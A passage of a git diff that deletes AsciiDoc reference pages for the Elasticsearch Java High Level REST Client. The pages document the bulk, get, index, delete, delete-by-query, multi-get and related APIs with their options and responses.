-include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Cluster Update Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates which transient settings have been applied -<3> Indicates which persistent settings have been applied diff --git a/docs/java-rest/high-level/cluster/remote_info.asciidoc b/docs/java-rest/high-level/cluster/remote_info.asciidoc deleted file mode 100644 index 6496a04a3a7..00000000000 --- a/docs/java-rest/high-level/cluster/remote_info.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: remote-info -:request: RemoteInfoRequest -:response: RemoteInfoResponse --- - -[id="{upid}-{api}"] -=== Remote Cluster Info API - -The Remote cluster info API allows to get all of the configured remote cluster information. - -[id="{upid}-{api}-request"] -==== Remote Cluster Info Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -There are no required parameters. - -==== Remote Cluster Info Response - -The returned +{response}+ allows to retrieve remote cluster information. -It returns connection and endpoint information keyed by the configured remote cluster alias. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/document/bulk.asciidoc b/docs/java-rest/high-level/document/bulk.asciidoc deleted file mode 100644 index 061516388c4..00000000000 --- a/docs/java-rest/high-level/document/bulk.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ --- -:api: bulk -:request: BulkRequest -:response: BulkResponse --- - -[id="{upid}-{api}"] -=== Bulk API - -NOTE: The Java High Level REST Client provides the -<<{upid}-{api}-processor>> to assist with bulk requests. - -[id="{upid}-{api}-request"] -==== Bulk Request - -A +{request}+ can be used to execute multiple index, update and/or delete -operations using a single request. - -It requires at least one operation to be added to the Bulk request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates the +{request}+ -<2> Adds a first `IndexRequest` to the Bulk request. See <<{upid}-index>> for -more information on how to build `IndexRequest`. -<3> Adds a second `IndexRequest` -<4> Adds a third `IndexRequest` - -WARNING: The Bulk API supports only documents encoded in JSON or SMILE. -Providing documents in any other format will result in an error. - -And different operation types can be added to the same +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-mixed-operations] --------------------------------------------------- -<1> Adds a `DeleteRequest` to the +{request}+. See <<{upid}-delete>> -for more information on how to build `DeleteRequest`. -<2> Adds an `UpdateRequest` to the +{request}+. See <<{upid}-update>> -for more information on how to build `UpdateRequest`. -<3> Adds an `IndexRequest` using the SMILE format - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the bulk request to be performed as a `TimeValue` -<2> Timeout to wait for the bulk request to be performed as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-active-shards] --------------------------------------------------- -<1> Sets the number of shard copies that must be active before proceeding with -the index/update/delete operations. -<2> Number of shard copies provided as a `ActiveShardCount`: can be -`ActiveShardCount.ALL`, `ActiveShardCount.ONE` or -`ActiveShardCount.DEFAULT` (default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> Global pipelineId used on all sub requests, unless overridden on a sub request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Global routingId used on all sub requests, unless overridden on a sub request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-index-type] --------------------------------------------------- -<1> A bulk request with a global index used on all sub requests, unless overridden on a sub request. -This parameter is @Nullable and can only be set during +{request}+ creation. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Bulk Response - -The returned +{response}+ contains information about the executed operations and - allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Iterate over the results of all operations -<2> Retrieve the response of the operation (successful or not), can be -`IndexResponse`, `UpdateResponse` or `DeleteResponse` which can all be seen as -`DocWriteResponse` instances -<3> Handle the response of an index operation -<4> Handle the response of a update operation -<5> Handle the response of a delete operation - -The Bulk response provides a method to quickly check if one or more operation -has failed: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-has-failures] --------------------------------------------------- -<1> This method returns `true` if at least one operation failed - -In such situation it is necessary to iterate over all operation results in order -to check if the operation failed, and if so, retrieve the corresponding failure: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-errors] --------------------------------------------------- -<1> Indicate if a given operation failed -<2> Retrieve the failure of the failed operation - -[id="{upid}-{api}-processor"] -==== Bulk Processor - -The `BulkProcessor` simplifies the usage of the Bulk API by providing -a utility class that allows index/update/delete operations to be -transparently executed as they are added to the processor. - -In order to execute the requests, the `BulkProcessor` requires the following -components: - -`RestHighLevelClient`:: This client is used to execute the +{request}+ -and to retrieve the `BulkResponse` -`BulkProcessor.Listener`:: This listener is called before and after -every +{request}+ execution or when a +{request}+ failed - -Then the `BulkProcessor.builder` method can be used to build a new -`BulkProcessor`: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-init] --------------------------------------------------- -<1> Create the `BulkProcessor.Listener` -<2> This method is called before each execution of a +{request}+ -<3> This method is called after each execution of a +{request}+ -<4> This method is called when a +{request}+ failed -<5> Create the `BulkProcessor` by calling the `build()` method from -the `BulkProcessor.Builder`. The `RestHighLevelClient.bulkAsync()` -method will be used to execute the +{request}+ under the hood. - -The `BulkProcessor.Builder` provides methods to configure how the -`BulkProcessor` should handle requests execution: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-options] --------------------------------------------------- -<1> Set when to flush a new bulk request based on the number of -actions currently added (defaults to 1000, use -1 to disable it) -<2> Set when to flush a new bulk request based on the size of -actions currently added (defaults to 5Mb, use -1 to disable it) -<3> Set the number of concurrent requests allowed to be executed -(default to 1, use 0 to only allow the execution of a single request) -<4> Set a flush interval flushing any +{request}+ pending if the -interval passes (defaults to not set) -<5> Set a constant back off policy that initially waits for 1 second -and retries up to 3 times. See `BackoffPolicy.noBackoff()`, -`BackoffPolicy.constantBackoff()` and `BackoffPolicy.exponentialBackoff()` -for more options. - -Once the `BulkProcessor` is created requests can be added to it: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-add] --------------------------------------------------- - -The requests will be executed by the `BulkProcessor`, which takes care of -calling the `BulkProcessor.Listener` for every bulk request. - -The listener provides methods to access to the +{request}+ and the +{response}+: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-listener] --------------------------------------------------- -<1> Called before each execution of a +{request}+, this method allows to know -the number of operations that are going to be executed within the +{request}+ -<2> Called after each execution of a +{request}+, this method allows to know if -the +{response}+ contains errors -<3> Called if the +{request}+ failed, this method allows to know -the failure - -Once all requests have been added to the `BulkProcessor`, its instance needs to -be closed using one of the two available closing methods. - -The `awaitClose()` method can be used to wait until all requests have been -processed or the specified waiting time elapses: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-await] --------------------------------------------------- -<1> The method returns `true` if all bulk requests completed and `false` if the -waiting time elapsed before all the bulk requests completed - -The `close()` method can be used to immediately close the `BulkProcessor`: -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-processor-close] --------------------------------------------------- - -Both methods flush the requests added to the processor before closing the -processor and also forbid any new request to be added to it. diff --git a/docs/java-rest/high-level/document/delete-by-query.asciidoc b/docs/java-rest/high-level/document/delete-by-query.asciidoc deleted file mode 100644 index f4ef87741e6..00000000000 --- a/docs/java-rest/high-level/document/delete-by-query.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ --- -:api: delete-by-query -:request: DeleteByQueryRequest -:response: DeleteByQueryResponse --- - -[id="{upid}-{api}"] -=== Delete By Query API - -[id="{upid}-{api}-request"] -==== Delete By Query Request - -A +{request}+ can be used to delete documents from an index. It requires an -existing index (or a set of indices) on which deletion is to be performed. - -The simplest form of a +{request}+ looks like this and deletes all documents -in an index: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates the +{request}+ on a set of indices. - -By default version conflicts abort the +{request}+ process but you can just -count them with this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-conflicts] --------------------------------------------------- -<1> Set `proceed` on version conflict - -You can limit the documents by adding a query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Only copy documents which have field `user` set to `kimchy` - -It’s also possible to limit the number of processed documents by setting `maxDocs`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-maxDocs] --------------------------------------------------- -<1> Only copy 10 documents - -By default +{request}+ uses batches of 1000. You can change the batch size -with `setBatchSize`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scrollSize] --------------------------------------------------- -<1> Use batches of 100 documents - -+{request}+ can also be parallelized using `sliced-scroll` with `setSlices`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-slices] --------------------------------------------------- -<1> set number of slices to use - -+{request}+ uses the `scroll` parameter to control how long it keeps the -"search context" alive. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scroll] --------------------------------------------------- -<1> set scroll time - -If you provide routing then the routing is copied to the scroll query, limiting the process to the shards that match -that routing value. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> set routing - - -==== Optional arguments -In addition to the options above the following arguments can optionally be also provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the delete by query request to be performed as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh index after calling delete by query - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Set indices options - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete By Query Response - -The returned +{response}+ contains information about the executed operations and -allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get total time taken -<2> Check if the request timed out -<3> Get total number of docs processed -<4> Number of docs that were deleted -<5> Number of batches that were executed -<6> Number of skipped docs -<7> Number of version conflicts -<8> Number of times request had to retry bulk index operations -<9> Number of times request had to retry search operations -<10> The total time this request has throttled itself not including the current throttle time if it is currently sleeping -<11> Remaining delay of any current throttle sleep or 0 if not sleeping -<12> Failures during search phase -<13> Failures during bulk index operation diff --git a/docs/java-rest/high-level/document/delete.asciidoc b/docs/java-rest/high-level/document/delete.asciidoc deleted file mode 100644 index 60da9d52787..00000000000 --- a/docs/java-rest/high-level/document/delete.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ --- -:api: delete -:request: DeleteRequest -:response: DeleteResponse --- - -[id="{upid}-{api}"] -=== Delete API - -[id="{upid}-{api}-request"] -==== Delete Request - -A +{request}+ has two required arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for primary shard to become available as a `TimeValue` -<2> Timeout to wait for primary shard to become available as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> Version - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version-type] --------------------------------------------------- -<1> Version type - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Handle the situation where number of successful shards is less than -total shards -<2> Handle the potential failures - - -It is also possible to check whether the document was found or not: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the document to be deleted was not found - -If there is a version conflict, an `ElasticsearchException` will -be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned - diff --git a/docs/java-rest/high-level/document/exists.asciidoc b/docs/java-rest/high-level/document/exists.asciidoc deleted file mode 100644 index 7ca3b82fb86..00000000000 --- a/docs/java-rest/high-level/document/exists.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: exists -:request: GetRequest -:response: boolean --- - -[id="{upid}-{api}"] -=== Exists API - -The exists API returns `true` if a document exists, and `false` otherwise. - -[id="{upid}-{api}-request"] -==== Exists Request - -It uses +{request}+ just like the <>. -All of its <> -are supported. Since `exists()` only returns `true` or `false`, we recommend -turning off fetching `_source` and any stored fields so the request is -slightly lighter: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id -<3> Disable fetching `_source`. -<4> Disable fetching stored fields. - -include::../execution.asciidoc[] - - -==== Source exists request -A variant of the exists request is `existsSource` method which has the additional check -that the document in question has stored the `source`. If the mapping for the index has opted -to remove support for storing JSON source in documents then this method will return false -for documents in this index. diff --git a/docs/java-rest/high-level/document/get-source.asciidoc b/docs/java-rest/high-level/document/get-source.asciidoc deleted file mode 100644 index f5a2ca8ec5d..00000000000 --- a/docs/java-rest/high-level/document/get-source.asciidoc +++ /dev/null @@ -1,72 +0,0 @@ --- -:api: get-source -:request: GetSourceRequest -:response: GetSourceResponse --- - -[id="{upid}-{api}"] -=== Get Source API - -This API helps to get only the `_source` field of a document. - -[id="{upid}-{api}-request"] -==== Get Source Request - -A +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -[id="{upid}-{api}-request-optional"] -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optional] --------------------------------------------------- -<1> `FetchSourceContext` 's first argument `fetchSource` must be `true`, otherwise -`ElasticsearchException` get thrown -<2> Arguments of the context `excludes` and `includes` are optional -(see examples in Get API documentation) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preference] --------------------------------------------------- -<1> Preference value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-realtime] --------------------------------------------------- -<1> Set realtime flag to `false` (`true` by default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Perform a refresh before retrieving the document (`false` by default) - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Source Response - -The returned +{response}+ contains the field `source` that represents the -source of a document as a map. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/document/get.asciidoc b/docs/java-rest/high-level/document/get.asciidoc deleted file mode 100644 index 2916eb9335c..00000000000 --- a/docs/java-rest/high-level/document/get.asciidoc +++ /dev/null @@ -1,126 +0,0 @@ --- -:api: get -:request: GetRequest -:response: GetResponse --- - -[id="{upid}-{api}"] -=== Get API - -[id="{upid}-{api}-request"] -==== Get Request - -A +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -[id="{upid}-{api}-request-optional-arguments"] -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-no-source] --------------------------------------------------- -<1> Disable source retrieval, enabled by default - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-include] --------------------------------------------------- -<1> Configure source inclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-exclude] --------------------------------------------------- -<1> Configure source exclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-stored] --------------------------------------------------- -<1> Configure retrieval for specific stored fields (requires fields to be -stored separately in the mappings) -<2> Retrieve the `message` stored field (requires the field to be stored -separately in the mappings) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preference] --------------------------------------------------- -<1> Preference value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-realtime] --------------------------------------------------- -<1> Set realtime flag to `false` (`true` by default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Perform a refresh before retrieving the document (`false` by default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> Version - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version-type] --------------------------------------------------- -<1> Version type - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Response - -The returned +{response}+ allows to retrieve the requested document along with -its metadata and eventually stored fields. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Retrieve the document as a `String` -<2> Retrieve the document as a `Map` -<3> Retrieve the document as a `byte[]` -<4> Handle the scenario where the document was not found. Note that although -the returned response has `404` status code, a valid +{response}+ is -returned rather than an exception thrown. Such response does not hold any -source document and its `isExists` method returns `false`. - -When a get request is performed against an index that does not exist, the -response has `404` status code, an `ElasticsearchException` gets thrown -which needs to be handled as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-indexnotfound] --------------------------------------------------- -<1> Handle the exception thrown because the index does not exist - -In case a specific document version has been requested, and the existing -document has a different version number, a version conflict is raised: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned diff --git a/docs/java-rest/high-level/document/index.asciidoc b/docs/java-rest/high-level/document/index.asciidoc deleted file mode 100644 index 5a201a02a88..00000000000 --- a/docs/java-rest/high-level/document/index.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ --- -:api: index -:request: IndexRequest -:response: IndexResponse --- - -[id="{upid}-{api}"] -=== Index API - -[id="{upid}-{api}-request"] -==== Index Request - -An +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-string] --------------------------------------------------- -<1> Index -<2> Document id for the request -<3> Document source provided as a `String` - -==== Providing the document source -The document source can be provided in different ways in addition to the -`String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-map] --------------------------------------------------- -<1> Document source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-xcontent] --------------------------------------------------- -<1> Document source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-shortcut] --------------------------------------------------- -<1> Document source provided as `Object` key-pairs, which gets converted to -JSON format - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for primary shard to become available as a `TimeValue` -<2> Timeout to wait for primary shard to become available as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> Version - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version-type] --------------------------------------------------- -<1> Version type - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-op-type] --------------------------------------------------- -<1> Operation type provided as an `DocWriteRequest.OpType` value -<2> Operation type provided as a `String`: can be `create` or `index` (default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> The name of the ingest pipeline to be executed before indexing the document - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Index Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Handle (if needed) the case where the document was created for the first -time -<2> Handle (if needed) the case where the document was rewritten as it was -already existing -<3> Handle the situation where number of successful shards is less than -total shards -<4> Handle the potential failures - -If there is a version conflict, an `ElasticsearchException` will -be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned - -Same will happen in case `opType` was set to `create` and a document with -same index and id already existed: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-optype] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned diff --git a/docs/java-rest/high-level/document/multi-get.asciidoc b/docs/java-rest/high-level/document/multi-get.asciidoc deleted file mode 100644 index 18f94d123d6..00000000000 --- a/docs/java-rest/high-level/document/multi-get.asciidoc +++ /dev/null @@ -1,134 +0,0 @@ --- -:api: multi-get -:request: MultiGetRequest -:response: MultiGetResponse --- - -[id="{upid}-{api}"] -=== Multi-Get API - -The `multiGet` API executes multiple <> -requests in a single http request in parallel. - -[id="{upid}-{api}-request"] -==== Multi-Get Request - -A +{request}+ is built empty and you add `MultiGetRequest.Item`s to configure -what to fetch: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id -<3> Add another item to fetch - -==== Optional arguments - -`multiGet` supports the same optional arguments that the -<> supports. -You can set most of these on the `Item`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-no-source] --------------------------------------------------- -<1> Disable source retrieval, enabled by default - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-include] --------------------------------------------------- -<1> Configure source inclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-exclude] --------------------------------------------------- -<1> Configure source exclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-stored] --------------------------------------------------- -<1> Configure retrieval for specific stored fields (requires fields to be -stored separately in the mappings) -<2> Retrieve the `foo` stored field (requires the field to be stored -separately in the mappings) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-item-extras] --------------------------------------------------- -<1> Routing value -<2> Version -<3> Version type - -{ref}/search-search.html#search-preference[`preference`], -{ref}/docs-get.html#realtime[`realtime`] -and -{ref}/docs-get.html#get-refresh[`refresh`] can be set on the main request but -not on any items: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-top-level-extras] --------------------------------------------------- -<1> Preference value -<2> Set realtime flag to `false` (`true` by default) -<3> Perform a refresh before retrieving the document (`false` by default) - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Multi Get Response - -The returned +{response}+ contains a list of `MultiGetItemResponse`s in -`getResponses` in the same order that they were requested. -`MultiGetItemResponse` contains *either* a -<> if the get succeeded -or a `MultiGetResponse.Failure` if it failed. A success looks just like a -normal `GetResponse`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getFailure` returns null because there isn't a failure. -<2> `getResponse` returns the `GetResponse`. -<3> Retrieve the document as a `String` -<4> Retrieve the document as a `Map` -<5> Retrieve the document as a `byte[]` -<6> Handle the scenario where the document was not found. Note that although -the returned response has `404` status code, a valid `GetResponse` is -returned rather than an exception thrown. Such response does not hold any -source document and its `isExists` method returns `false`. - -When one of the subrequests as performed against an index that does not exist -`getFailure` will contain an exception: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-indexnotfound] --------------------------------------------------- -<1> `getResponse` is null. -<2> `getFailure` isn't and contains an `Exception`. -<3> That `Exception` is actually an `ElasticsearchException` -<4> and it has a status of `NOT_FOUND`. It'd have been an HTTP 404 if this -wasn't a multi get. -<5> `getMessage` explains the actual cause, `no such index`. - -In case a specific document version has been requested, and the existing -document has a different version number, a version conflict is raised: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> `getResponse` is null. -<2> `getFailure` isn't and contains an `Exception`. -<3> That `Exception` is actually an `ElasticsearchException` -<4> and it has a status of `CONFLICT`. It'd have been an HTTP 409 if this -wasn't a multi get. -<5> `getMessage` explains the actual cause, ` diff --git a/docs/java-rest/high-level/document/multi-term-vectors.asciidoc b/docs/java-rest/high-level/document/multi-term-vectors.asciidoc deleted file mode 100644 index 52d633b2d59..00000000000 --- a/docs/java-rest/high-level/document/multi-term-vectors.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ --- -:api: multi-term-vectors -:request: MultiTermVectorsRequest -:response: MultiTermVectorsResponse -:tvrequest: TermVectorsRequest --- - -[id="{upid}-{api}"] -=== Multi Term Vectors API - -Multi Term Vectors API allows to get multiple term vectors at once. - -[id="{upid}-{api}-request"] -==== Multi Term Vectors Request -There are two ways to create a +{request}+. - -The first way is to create an empty +{request}+, and then add individual -<> to it. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 